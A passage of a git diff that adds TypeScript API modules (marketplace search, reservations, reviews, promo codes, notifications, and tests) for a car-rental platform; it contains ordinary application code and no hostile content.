+ return prisma.review.create({ + data: { ...data, renterId: data.renterId ?? undefined, isPublished: true }, + }) +} + +export async function invalidateReviewToken(reservationId: string) { + return prisma.reservation.update({ where: { id: reservationId }, data: { reviewToken: null } }) +} + +export async function findOfferByCode(code: string) { + return prisma.offer.findFirst({ + where: { promoCode: code, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, + }) +} diff --git a/apps/api/src/modules/marketplace/marketplace.routes.ts b/apps/api/src/modules/marketplace/marketplace.routes.ts new file mode 100644 index 0000000..f6e3ad1 --- /dev/null +++ b/apps/api/src/modules/marketplace/marketplace.routes.ts @@ -0,0 +1,150 @@ +import { Router } from 'express' +import { optionalRenterAuth } from '../../middleware/requireRenterAuth' +import { parseBody, parseParams, parseQuery } from '../../http/validate' +import { ok, created } from '../../http/respond' +import { isDatabaseUnavailableError } from '../../lib/isDatabaseUnavailable' +import * as service from './marketplace.service' +import { + paginationSchema, searchSchema, companiesQuerySchema, marketplaceReservationSchema, + reviewBodySchema, slugParamSchema, vehicleParamSchema, reviewTokenSchema, offerCodeParamSchema, +} from './marketplace.schemas' + +const router = Router() +router.use(optionalRenterAuth) + +router.get('/offers', async (_req, res, next) => { + try { + ok(res, await service.getPublicOffers()) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.get('/cities', async (_req, res, next) => { + try { + ok(res, await service.getCities()) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.get('/companies', async (req, res, next) => { + try { + const { city, hasOffer } = parseQuery(companiesQuerySchema, req) + const { page, pageSize } = parseQuery(paginationSchema, req) + ok(res, await service.getListedCompanies({ city, hasOffer, page, pageSize })) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.get('/search', async (req, res, next) => { + try { + const filters = parseQuery(searchSchema, req) + const pagination = parseQuery(paginationSchema, req) + ok(res, await service.searchVehicles({ ...filters, ...pagination })) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.post('/reservations', async (req, res, next) => { + try { + const body = parseBody(marketplaceReservationSchema, req) + const result = await service.createMarketplaceReservation(body) + created(res, result) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Service temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.get('/review/:token', async (req, res, next) => { + try { + const { token } = parseParams(reviewTokenSchema, req) + ok(res, await service.getReviewContext(token)) + } catch (err) { next(err) } +}) + +router.post('/review/:token', async (req, res, next) => { + try { + const { token } = parseParams(reviewTokenSchema, req) + const body = parseBody(reviewBodySchema, req) + const result = await service.submitReview(token, body) + created(res, result) + } catch (err) { next(err) } +}) + +router.post('/offers/:code/validate', async (req, res, next) => { + try { + const { code } = parseParams(offerCodeParamSchema, req) + ok(res, await service.validateOfferCode(code)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Offer validation is temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.get('/:slug', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getCompanyPage(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Marketplace data is temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.get('/:slug/reviews', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getCompanyReviews(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.get('/:slug/vehicles', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getCompanyVehicles(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.get('/:slug/vehicles/:id', async (req, res, next) => { + try { + const { slug, id } = parseParams(vehicleParamSchema, req) + ok(res, await service.getVehicleDetail(slug, id)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Vehicle details are temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.get('/:slug/offers', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getCompanyOffers(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +export default router diff --git a/apps/api/src/modules/marketplace/marketplace.schemas.ts b/apps/api/src/modules/marketplace/marketplace.schemas.ts new file mode 100644 index 0000000..dc10868 --- /dev/null +++ b/apps/api/src/modules/marketplace/marketplace.schemas.ts @@ -0,0 +1,47 @@ +import { z } from 'zod' + +export const paginationSchema = z.object({ + page: z.coerce.number().int().min(1).max(10000).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const searchSchema = z.object({ + city: z.string().trim().max(100).optional(), + startDate: z.string().datetime().optional(), + endDate: z.string().datetime().optional(), + category: z.string().trim().max(50).optional(), + maxPrice: z.coerce.number().int().min(0).max(1_000_000).optional(), + transmission: z.string().trim().max(20).optional(), + make: z.string().trim().max(60).optional(), + model: z.string().trim().max(60).optional(), +}) + +export const companiesQuerySchema = z.object({ + city: z.string().trim().max(100).optional(), + hasOffer: z.string().optional(), +}) + +export const marketplaceReservationSchema = z.object({ + vehicleId: z.string().cuid(), + companySlug: z.string().trim().max(100), + firstName: z.string().min(1).max(100), + lastName: z.string().min(1).max(100), + email: z.string().email(), + phone: z.string().max(30).optional(), + startDate: z.string().datetime(), + endDate: z.string().datetime(), + notes: z.string().max(500).optional(), + language: z.enum(['en', 'fr', 'ar']).default('fr'), +}) + +export const reviewBodySchema = z.object({ + overallRating: z.number().int().min(1).max(5), + vehicleRating: z.number().int().min(1).max(5).optional(), + serviceRating: z.number().int().min(1).max(5).optional(), + comment: z.string().max(2000).optional(), +}) + +export const slugParamSchema = z.object({ slug: z.string() }) +export const vehicleParamSchema = z.object({ slug: z.string(), id: z.string() }) +export const reviewTokenSchema = z.object({ token: z.string() }) +export const offerCodeParamSchema = z.object({ code: z.string() }) diff --git a/apps/api/src/modules/marketplace/marketplace.service.ts b/apps/api/src/modules/marketplace/marketplace.service.ts new file mode 100644 index 0000000..086723e --- /dev/null +++ b/apps/api/src/modules/marketplace/marketplace.service.ts @@ -0,0 +1,213 @@ +import { AppError, NotFoundError, ConflictError } from '../../http/errors' +import { getVehicleAvailabilitySummary } from '../../services/vehicleAvailabilityService' +import { sendNotification, sendTransactionalEmail } from '../../services/notificationService' +import { marketplaceReservationEmail, type Lang } from '../../lib/emailTranslations' +import * as repo from './marketplace.repo' + +export async function getPublicOffers() { + return repo.findPublicOffers() +} + +export async function getCities() { + const rows = await repo.findCitiesFromCompanies() + const map = new Map() + for (const row of rows) { + const city = row.brand?.publicCity?.trim() + if (!city) continue + const key = city.toLocaleLowerCase() + if (!map.has(key)) map.set(key, city) + } + return Array.from(map.values()).sort((a, b) => a.localeCompare(b, undefined, { sensitivity: 'base' })) +} + +export async function getListedCompanies(params: { + city?: string; hasOffer?: string; page?: number; pageSize?: number +}) { + const page = params.page ?? 1 + const pageSize = params.pageSize ?? 20 + const where: any = { status: { in: ['ACTIVE', 'TRIALING'] }, brand: { isListedOnMarketplace: true } } + if (params.city) where.brand = { ...where.brand, publicCity: { contains: params.city, mode: 'insensitive' } } + if (params.hasOffer === 'true') { + where.offers = { some: { isPublic: true, isActive: true, validUntil: { gte: new Date() } } } + } + return repo.findListedCompanies(where, (page - 1) * pageSize, pageSize) +} + +export async function searchVehicles(params: { + city?: string; startDate?: string; endDate?: string; category?: string + maxPrice?: number; transmission?: string; make?: string; model?: string + page?: number; pageSize?: number +}) { + const page = params.page ?? 1 + const pageSize = params.pageSize ?? 20 + const where: any = { + isPublished: true, + status: 'AVAILABLE', + company: { status: { in: ['ACTIVE', 'TRIALING'] }, brand: { isListedOnMarketplace: true } }, + } + if (params.category) where.category = params.category + if (params.maxPrice !== undefined) where.dailyRate = { lte: params.maxPrice } + if (params.transmission) where.transmission = params.transmission + if (params.make) where.make = { contains: params.make, mode: 'insensitive' } + if (params.model) where.model = { contains: params.model, mode: 'insensitive' } + if (params.city) { + where.company = { ...where.company, brand: { isListedOnMarketplace: true, publicCity: { contains: params.city, mode: 'insensitive' } } } + } + + const vehicles = await repo.findPublishedVehicles(where, (page - 1) * pageSize, pageSize) + + const availability = await Promise.all( + vehicles.map(async (v) => { + const a = await getVehicleAvailabilitySummary(v.id, { + range: params.startDate && params.endDate + ? { startDate: new Date(params.startDate), endDate: new Date(params.endDate) } + : undefined, + }) + return [v.id, a] as const + }), + ) + const availMap = new Map(availability) + + return vehicles.map((v) => ({ + ...v, + availability: availMap.get(v.id)?.available ?? null, + availabilityStatus: availMap.get(v.id)?.status ?? 'AVAILABLE', + nextAvailableAt: availMap.get(v.id)?.nextAvailableAt ?? null, + })) +} + +export async function createMarketplaceReservation(body: { + vehicleId: string; companySlug: string; firstName: string; lastName: string + email: string; phone?: string; startDate: string; endDate: string + notes?: string; language?: string +}) { + const startDate = new Date(body.startDate) + const endDate = new Date(body.endDate) + + if (endDate <= startDate) { + throw new AppError('End date must be after start date', 400, 'invalid_dates') + } + + const vehicle = await repo.findVehicleForMarketplace(body.vehicleId, body.companySlug) + if (!vehicle) throw new NotFoundError('Vehicle not found') + + const availability = await getVehicleAvailabilitySummary(body.vehicleId, { range: { startDate, endDate } }) + if (!availability.available) { + throw new AppError('Vehicle is not available for the selected dates', 409, 'unavailable', { + nextAvailableAt: availability.nextAvailableAt?.toISOString() ?? null, + }) + } + + const customer = await repo.upsertMarketplaceCustomer(vehicle.companyId, { + email: body.email, firstName: body.firstName, lastName: body.lastName, phone: body.phone, + }) + + const totalDays = Math.max(1, Math.ceil((endDate.getTime() - startDate.getTime()) / 86_400_000)) + const totalAmount = vehicle.dailyRate * totalDays + + const reservation = await repo.createMarketplaceReservation({ + companyId: vehicle.companyId, vehicleId: body.vehicleId, customerId: customer.id, + startDate, endDate, dailyRate: vehicle.dailyRate, totalDays, totalAmount, notes: body.notes, + }) + + const lang = (body.language ?? 'fr') as Lang + const companyName = vehicle.company.brand?.displayName ?? (vehicle.company as any).name + const emailOpts = { + firstName: body.firstName, vehicleYear: vehicle.year, vehicleMake: vehicle.make, vehicleModel: vehicle.model, + companyName, startDate, endDate, totalDays, + rateDisplay: (vehicle.dailyRate / 100).toFixed(2), + totalDisplay: (totalAmount / 100).toFixed(2), + email: body.email, phone: body.phone, + } + + sendTransactionalEmail({ + to: body.email, + subject: marketplaceReservationEmail.subject(`${vehicle.make} ${vehicle.model}`, lang), + html: marketplaceReservationEmail.html(emailOpts, lang), + text: marketplaceReservationEmail.text(emailOpts, lang), + }).catch(() => null) + + sendNotification({ + type: 'NEW_BOOKING', + title: 'New Marketplace Reservation Request', + body: `${body.firstName} ${body.lastName} requested ${vehicle.make} ${vehicle.model} from ${startDate.toISOString().slice(0, 10)} to ${endDate.toISOString().slice(0, 10)}.`, + companyId: vehicle.companyId, + channels: ['IN_APP'], + }).catch(() => null) + + return { reservationId: reservation.id } +} + +export async function getCompanyPage(slug: string) { + const company = await repo.findCompanyPage(slug) + if (!company) throw new NotFoundError('Company not found') + + const vehicles = await Promise.all( + company.vehicles.map(async (v) => { + const a = await getVehicleAvailabilitySummary(v.id) + return { ...v, availability: a.available, availabilityStatus: a.status, nextAvailableAt: a.nextAvailableAt } + }), + ) + return { ...company, vehicles } +} + +export async function getCompanyReviews(slug: string) { + const company = await repo.findCompanyBySlug(slug) + return repo.findCompanyReviews(company.id) +} + +export async function getCompanyVehicles(slug: string) { + const company = await repo.findCompanyBySlug(slug) + return repo.findCompanyVehicles(company.id) +} + +export async function getVehicleDetail(slug: string, vehicleId: string) { + const vehicle = await repo.findVehicleById(slug, vehicleId) + const availability = await getVehicleAvailabilitySummary(vehicle.id) + return { ...vehicle, availability: availability.available, availabilityStatus: availability.status, nextAvailableAt: availability.nextAvailableAt } +} + +export async function getCompanyOffers(slug: string) { + const company = await repo.findCompanyBySlug(slug) + return repo.findCompanyOffers(company.id) +} + +export async function getReviewContext(token: string) { + const reservation = await repo.findReservationByReviewToken(token) + if (!reservation) throw new NotFoundError('Review link is invalid or has expired') + if (reservation.review) throw new ConflictError('A review has already been submitted for this reservation') + + return { + reservationId: reservation.id, + companyName: reservation.company.brand?.displayName ?? (reservation.company as any).name, + companyLogoUrl: reservation.company.brand?.logoUrl ?? null, + vehicle: `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model}`, + vehiclePhoto: reservation.vehicle.photos[0] ?? null, + } +} + +export async function submitReview(token: string, body: { + overallRating: number; vehicleRating?: number; serviceRating?: number; comment?: string +}) { + const reservation = await repo.findReservationForReviewSubmit(token) + if (!reservation) throw new NotFoundError('Review link is invalid or has expired') + if (reservation.review) throw new ConflictError('A review has already been submitted for this reservation') + + const review = await repo.createReview({ + reservationId: reservation.id, + companyId: reservation.companyId, + renterId: reservation.renterId, + ...body, + }) + await repo.invalidateReviewToken(reservation.id) + return { reviewId: review.id } +} + +export async function validateOfferCode(code: string) { + const offer = await repo.findOfferByCode(code) + if (!offer) throw new NotFoundError('Promo code not found or expired') + if (offer.maxRedemptions && offer.redemptionCount >= offer.maxRedemptions) { + throw new ConflictError('Promo code has reached its maximum redemptions') + } + return offer +} diff --git a/apps/api/src/modules/marketplace/marketplace.test.ts b/apps/api/src/modules/marketplace/marketplace.test.ts new file mode 100644 index 0000000..00afd2c --- /dev/null +++ b/apps/api/src/modules/marketplace/marketplace.test.ts @@ -0,0 +1,205 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest' +import { NotFoundError, ConflictError, AppError } from '../../http/errors' + +vi.mock('./marketplace.repo', () => ({ + findPublicOffers: vi.fn(), + findCitiesFromCompanies: vi.fn(), + findListedCompanies: vi.fn(), + findPublishedVehicles: vi.fn(), + findVehicleForMarketplace: vi.fn(), + upsertMarketplaceCustomer: vi.fn(), + createMarketplaceReservation: vi.fn(), + findCompanyPage: vi.fn(), + findCompanyBySlug: vi.fn(), + findCompanyReviews: vi.fn(), + findCompanyVehicles: vi.fn(), + findVehicleById: vi.fn(), + findCompanyOffers: vi.fn(), + findReservationByReviewToken: vi.fn(), + findReservationForReviewSubmit: vi.fn(), + createReview: vi.fn(), + invalidateReviewToken: vi.fn(), + findOfferByCode: vi.fn(), +})) + +vi.mock('../../services/vehicleAvailabilityService', () => ({ + getVehicleAvailabilitySummary: vi.fn(), +})) + +vi.mock('../../services/notificationService', () => ({ + sendNotification: vi.fn().mockResolvedValue(undefined), + sendTransactionalEmail: vi.fn().mockResolvedValue(undefined), +})) + +vi.mock('../../lib/emailTranslations', () => ({ + marketplaceReservationEmail: { + subject: vi.fn(() => 'Subject'), + html: vi.fn(() => ''), + text: vi.fn(() => 'text'), + }, +})) + +import * as repo from './marketplace.repo' +import { getVehicleAvailabilitySummary } from '../../services/vehicleAvailabilityService' +import { + getCities, searchVehicles, createMarketplaceReservation, + getReviewContext, submitReview, validateOfferCode, +} from './marketplace.service' + +const SLUG = 'test-company' + +function makeVehicle(overrides: object = {}) { + return { + id: 'v-1', dailyRate: 10000, year: 2022, make: 'Toyota', model: 'Camry', + isPublished: true, status: 'AVAILABLE', companyId: 'co-1', + company: { name: 'Test Co', brand: { displayName: 'Test Co' } }, + ...overrides, + } +} + +beforeEach(() => { vi.clearAllMocks() }) + +// ──────────────────────────────────────────────────────────────────────────── +describe('getCities', () => { + it('deduplicates and sorts cities case-insensitively', async () => { + vi.mocked(repo.findCitiesFromCompanies).mockResolvedValue([ + { brand: { publicCity: 'Casablanca' } }, + { brand: { publicCity: 'casablanca' } }, + { brand: { publicCity: 'Rabat' } }, + { brand: null }, + ] as any) + + const result = await getCities() + expect(result).toEqual(['Casablanca', 'Rabat']) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('searchVehicles', () => { + it('returns vehicles enriched with availability data', async () => { + vi.mocked(repo.findPublishedVehicles).mockResolvedValue([makeVehicle()] as any) + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: true, status: 'AVAILABLE', nextAvailableAt: null, blockingReason: null }) + + const result = await searchVehicles({ city: 'Casablanca' }) + + expect(repo.findPublishedVehicles).toHaveBeenCalledOnce() + expect(result[0].availability).toBe(true) + expect(result[0].availabilityStatus).toBe('AVAILABLE') + }) + + it('passes date range to availability service when provided', async () => { + vi.mocked(repo.findPublishedVehicles).mockResolvedValue([makeVehicle()] as any) + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: false, status: 'RESERVED', nextAvailableAt: new Date('2025-07-01'), blockingReason: 'RESERVATION' }) + + const result = await searchVehicles({ startDate: '2025-06-01T00:00:00.000Z', endDate: '2025-06-04T00:00:00.000Z' }) + + expect(getVehicleAvailabilitySummary).toHaveBeenCalledWith('v-1', { + range: { startDate: new Date('2025-06-01T00:00:00.000Z'), endDate: new Date('2025-06-04T00:00:00.000Z') }, + }) + expect(result[0].availability).toBe(false) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('createMarketplaceReservation', () => { + const baseBody = { + vehicleId: 'v-1', companySlug: SLUG, + firstName: 'Ali', lastName: 'Ben', email: 'ali@test.com', + startDate: '2025-06-01T00:00:00.000Z', endDate: '2025-06-04T00:00:00.000Z', + } + + it('creates reservation and returns reservationId', async () => { + vi.mocked(repo.findVehicleForMarketplace).mockResolvedValue(makeVehicle() as any) + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: true, status: 'AVAILABLE', nextAvailableAt: null, blockingReason: null }) + vi.mocked(repo.upsertMarketplaceCustomer).mockResolvedValue({ id: 'c-1' } as any) + vi.mocked(repo.createMarketplaceReservation).mockResolvedValue({ id: 'r-1' } as any) + + const result = await createMarketplaceReservation(baseBody) + expect(result.reservationId).toBe('r-1') + }) + + it('throws NotFoundError when vehicle not found', async () => { + vi.mocked(repo.findVehicleForMarketplace).mockResolvedValue(null) + + await expect(createMarketplaceReservation(baseBody)).rejects.toBeInstanceOf(NotFoundError) + }) + + it('throws AppError when vehicle is unavailable', async () => { + vi.mocked(repo.findVehicleForMarketplace).mockResolvedValue(makeVehicle() as any) + vi.mocked(getVehicleAvailabilitySummary).mockResolvedValue({ available: false, status: 'RESERVED', nextAvailableAt: null, blockingReason: 'RESERVATION' }) + + await expect(createMarketplaceReservation(baseBody)).rejects.toMatchObject({ error: 'unavailable' }) + }) + + it('throws AppError for invalid date range', async () => { + await expect( + createMarketplaceReservation({ ...baseBody, startDate: '2025-06-04T00:00:00.000Z', endDate: '2025-06-01T00:00:00.000Z' }), + ).rejects.toMatchObject({ error: 'invalid_dates' }) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('getReviewContext', () => { + it('returns review context for a valid unreviewd token', async () => { + vi.mocked(repo.findReservationByReviewToken).mockResolvedValue({ + id: 'r-1', companyId: 'co-1', renterId: null, reviewToken: 'tok', + vehicle: { year: 2022, make: 'Toyota', model: 'Camry', photos: ['photo.jpg'] }, + company: { name: 'Test Co', brand: { displayName: 'Test Co', logoUrl: 'logo.png' } }, + review: null, + } as any) + + const result = await getReviewContext('tok') + expect(result.reservationId).toBe('r-1') + expect(result.vehiclePhoto).toBe('photo.jpg') + }) + + it('throws NotFoundError for unknown token', async () => { + vi.mocked(repo.findReservationByReviewToken).mockResolvedValue(null) + await expect(getReviewContext('bad')).rejects.toBeInstanceOf(NotFoundError) + }) + + it('throws ConflictError when already reviewed', async () => { + vi.mocked(repo.findReservationByReviewToken).mockResolvedValue({ + id: 'r-1', companyId: 'co-1', renterId: null, + vehicle: { year: 2022, make: 'Toyota', model: 'Camry', photos: [] }, + company: { name: 'Test Co', brand: null }, + review: { id: 'rev-1' }, + } as any) + + await expect(getReviewContext('tok')).rejects.toBeInstanceOf(ConflictError) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('submitReview', () => { + it('creates review and invalidates token', async () => { + vi.mocked(repo.findReservationForReviewSubmit).mockResolvedValue({ id: 'r-1', companyId: 'co-1', renterId: null, review: null } as any) + vi.mocked(repo.createReview).mockResolvedValue({ id: 'rev-1' } as any) + vi.mocked(repo.invalidateReviewToken).mockResolvedValue(undefined as any) + + const result = await submitReview('tok', { overallRating: 5 }) + + expect(repo.createReview).toHaveBeenCalledOnce() + expect(repo.invalidateReviewToken).toHaveBeenCalledWith('r-1') + expect(result.reviewId).toBe('rev-1') + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('validateOfferCode', () => { + it('returns offer when code is valid and not exhausted', async () => { + vi.mocked(repo.findOfferByCode).mockResolvedValue({ id: 'o-1', maxRedemptions: null, redemptionCount: 0 } as any) + const result = await validateOfferCode('PROMO10') + expect((result as any).id).toBe('o-1') + }) + + it('throws NotFoundError for unknown code', async () => { + vi.mocked(repo.findOfferByCode).mockResolvedValue(null) + await expect(validateOfferCode('BAD')).rejects.toBeInstanceOf(NotFoundError) + }) + + it('throws ConflictError when max redemptions reached', async () => { + vi.mocked(repo.findOfferByCode).mockResolvedValue({ id: 'o-1', maxRedemptions: 10, redemptionCount: 10 } as any) + await expect(validateOfferCode('PROMO10')).rejects.toBeInstanceOf(ConflictError) + }) +}) diff --git a/apps/api/src/modules/notifications/notification.repo.ts b/apps/api/src/modules/notifications/notification.repo.ts new file mode 100644 index 0000000..014a34f --- /dev/null +++ b/apps/api/src/modules/notifications/notification.repo.ts @@ -0,0 +1,64 @@ +import { prisma } from '../../lib/prisma' +import { NotificationType, NotificationChannel } from '@rentaldrivego/database' + +// ─── Company notifications ──────────────────────────────────── + +export function findCompany(companyId: string, unread?: string) { + const where: any = { companyId, channel: 'IN_APP' } + if (unread === 'true') where.readAt = null + return prisma.notification.findMany({ where, orderBy: { createdAt: 'desc' }, take: 50 }) +} + +export function countUnread(companyId: string) { + return prisma.notification.count({ where: { companyId, channel: 'IN_APP', readAt: null } }) +} + +export function markRead(id: string, companyId: string) { + return prisma.notification.updateMany({ where: { id, companyId }, data: { readAt: new Date(), status: 'READ' } }) +} + +export function markAllRead(companyId: string) { + return prisma.notification.updateMany({ where: { companyId, readAt: null }, data: { readAt: new Date(), status: 'READ' } }) +} + +export function findEmployeePreferences(employeeId: string) { + return prisma.notificationPreference.findMany({ where: { employeeId } }) +} + +export async function upsertEmployeePreferences(employeeId: string, prefs: Array<{ notificationType: string; channel: string; enabled: boolean }>) { + for (const pref of prefs) { + await prisma.notificationPreference.upsert({ + where: { employeeId_notificationType_channel: { employeeId, notificationType: pref.notificationType as NotificationType, channel: pref.channel as NotificationChannel } }, + create: { employeeId, notificationType: pref.notificationType as NotificationType, channel: pref.channel as NotificationChannel, enabled: pref.enabled }, + update: { enabled: pref.enabled }, + }) + } +} + +// ─── Renter notifications ───────────────────────────────────── + +export function findRenter(renterId: string) { + return prisma.notification.findMany({ where: { renterId, channel: 'IN_APP' }, orderBy: { createdAt: 'desc' }, take: 50 }) +} + +export function markRenterRead(id: string, renterId: string) { + return prisma.notification.updateMany({ where: { id, renterId }, data: { readAt: new Date(), status: 'READ' } }) +} + +export function markAllRenterRead(renterId: string) { + return prisma.notification.updateMany({ where: { renterId, channel: 'IN_APP', readAt: null }, data: { readAt: new Date(), status: 'READ' } }) +} + +export function findRenterPreferences(renterId: string) { + return prisma.notificationPreference.findMany({ where: { renterId } }) +} + +export async function upsertRenterPreferences(renterId: string, prefs: Array<{ notificationType: string; channel: string; enabled: boolean }>) { + for (const pref of prefs) { + await prisma.notificationPreference.upsert({ + where: { renterId_notificationType_channel: { renterId, notificationType: pref.notificationType as NotificationType, channel: pref.channel as NotificationChannel } }, + create: { renterId, notificationType: pref.notificationType as NotificationType, channel: pref.channel as NotificationChannel, enabled: pref.enabled }, + update: { enabled: pref.enabled }, + }) + } +} diff --git a/apps/api/src/modules/notifications/notification.routes.ts b/apps/api/src/modules/notifications/notification.routes.ts new file mode 100644 index 0000000..03444ed --- /dev/null +++ b/apps/api/src/modules/notifications/notification.routes.ts @@ -0,0 +1,96 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRenterAuth } from '../../middleware/requireRenterAuth' +import { parseBody, parseQuery, parseParams } from '../../http/validate' +import { ok } from '../../http/respond' +import * as service from './notification.service' +import { preferencesSchema, idParamSchema, unreadQuerySchema } from './notification.schemas' + +const router = Router() + +const companyAuth = [requireCompanyAuth, requireTenant, requireSubscription] as const + +// ─── Company notifications ──────────────────────────────────── + +router.get('/company', ...companyAuth, async (req, res, next) => { + try { + const { unread } = parseQuery(unreadQuerySchema, req) + ok(res, { data: await service.listCompany(req.companyId, unread) }) + } catch (err) { next(err) } +}) + +router.get('/unread-count', ...companyAuth, async (req, res, next) => { + try { + ok(res, { data: { unread: await service.countUnread(req.companyId) } }) + } catch (err) { next(err) } +}) + +router.post('/company/:id/read', ...companyAuth, async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.markRead(id, req.companyId) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.post('/company/read-all', ...companyAuth, async (req, res, next) => { + try { + await service.markAllRead(req.companyId) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.get('/company/preferences', ...companyAuth, async (req, res, next) => { + try { + ok(res, { data: await service.getPreferences(req.employee.id) }) + } catch (err) { next(err) } +}) + +router.patch('/company/preferences', ...companyAuth, async (req, res, next) => { + try { + const prefs = parseBody(preferencesSchema, req) + await service.setPreferences(req.employee.id, prefs) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +// ─── Renter notifications ───────────────────────────────────── + +router.get('/renter', requireRenterAuth, async (req, res, next) => { + try { + ok(res, { data: await service.listRenter(req.renterId) }) + } catch (err) { next(err) } +}) + +router.post('/renter/:id/read', requireRenterAuth, async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.markRenterRead(id, req.renterId) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.post('/renter/read-all', requireRenterAuth, async (req, res, next) => { + try { + await service.markAllRenterRead(req.renterId) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.get('/renter/preferences', requireRenterAuth, async (req, res, next) => { + try { + ok(res, { data: await service.getRenterPreferences(req.renterId) }) + } catch (err) { next(err) } +}) + +router.patch('/renter/preferences', requireRenterAuth, async (req, res, next) => { + try { + const prefs = parseBody(preferencesSchema, req) + await service.setRenterPreferences(req.renterId, prefs) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/notifications/notification.schemas.ts b/apps/api/src/modules/notifications/notification.schemas.ts new file mode 100644 index 0000000..675a0e4 --- /dev/null +++ b/apps/api/src/modules/notifications/notification.schemas.ts @@ -0,0 +1,17 @@ +import { z } from 'zod' + +export const preferenceItemSchema = z.object({ + notificationType: z.string(), + channel: z.string(), + enabled: z.boolean(), +}) + +export const preferencesSchema = z.array(preferenceItemSchema) + +export const idParamSchema = z.object({ + id: z.string().min(1), +}) + +export const unreadQuerySchema = z.object({ + unread: z.string().optional(), +}) diff --git a/apps/api/src/modules/notifications/notification.service.ts b/apps/api/src/modules/notifications/notification.service.ts new file mode 100644 index 0000000..106990e --- /dev/null +++ b/apps/api/src/modules/notifications/notification.service.ts @@ -0,0 +1,14 @@ +import * as repo from './notification.repo' + +export const listCompany = (companyId: string, unread?: string) => repo.findCompany(companyId, unread) +export const countUnread = (companyId: string) => repo.countUnread(companyId) +export const markRead = (id: string, companyId: string) => repo.markRead(id, companyId) +export const markAllRead = (companyId: string) => repo.markAllRead(companyId) +export const getPreferences = (employeeId: string) => repo.findEmployeePreferences(employeeId) +export const setPreferences = (employeeId: string, prefs: any[]) => repo.upsertEmployeePreferences(employeeId, prefs) + +export const listRenter = (renterId: string) => repo.findRenter(renterId) +export const markRenterRead = (id: string, renterId: string) => repo.markRenterRead(id, renterId) +export const markAllRenterRead = (renterId: string) => repo.markAllRenterRead(renterId) +export const getRenterPreferences = (renterId: string) => repo.findRenterPreferences(renterId) +export const setRenterPreferences = (renterId: string, prefs: any[]) => repo.upsertRenterPreferences(renterId, prefs) diff --git a/apps/api/src/modules/offers/offer.repo.ts b/apps/api/src/modules/offers/offer.repo.ts new file mode 100644 index 0000000..dad4405 --- /dev/null +++ b/apps/api/src/modules/offers/offer.repo.ts @@ -0,0 +1,63 @@ +import { prisma } from '../../lib/prisma' + +export function findMany(companyId: string, filters: { active?: string; public?: string }) { + const where: any = { companyId } + if (filters.active !== undefined) where.isActive = filters.active === 'true' + if (filters.public !== undefined) where.isPublic = filters.public === 'true' + return prisma.offer.findMany({ where, orderBy: { createdAt: 'desc' } }) +} + +export function findByIdOrThrow(id: string, companyId: string) { + return prisma.offer.findFirstOrThrow({ where: { id, companyId }, include: { vehicles: true } }) +} + +export function findFirst(id: string, companyId: string) { + return prisma.offer.findFirst({ where: { id, companyId } }) +} + +export async function create(companyId: string, data: any, vehicleIds: string[]) { + return prisma.offer.create({ + data: { + ...data, + companyId, + validFrom: new Date(data.validFrom), + validUntil: new Date(data.validUntil), + vehicles: vehicleIds.length > 0 ? { create: vehicleIds.map((id) => ({ vehicleId: id })) } : undefined, + }, + include: { vehicles: true }, + }) +} + +export async function update(id: string, data: any, vehicleIds?: string[]) { + return prisma.$transaction(async (tx) => { + await tx.offer.update({ + where: { id }, + data: { + ...data, + validFrom: data.validFrom ? new Date(data.validFrom) : undefined, + validUntil: data.validUntil ? new Date(data.validUntil) 